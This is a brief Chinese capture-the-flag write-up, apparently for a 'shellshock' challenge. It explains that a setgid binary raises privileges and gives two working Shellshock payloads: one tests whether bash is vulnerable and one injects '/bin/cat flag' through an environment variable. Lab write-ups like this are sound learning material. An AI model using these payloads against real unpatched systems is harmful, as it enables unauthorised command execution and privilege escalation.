- 这题考验对linux的权限认知,首先shellshock程序有特殊sgid权限,当执行shellshock时,当前的权限就会上升到shellshock_pwn,就会有查看flag的权限了,然后利用shellshock(破壳)漏洞来任意bash命令执行cat flag
![](https://img.haomeiwen.com/i5808046/c1a9fb7b9ccd3921.png)
- 测试有无破壳漏洞
env x='() { :;}; echo vulnerable' ./bash -c "test"
- cat flag
env x='() { :;}; /bin/cat flag' ./shellshock
![](https://img.haomeiwen.com/i5808046/4620665a4b677b9a.png)
网友评论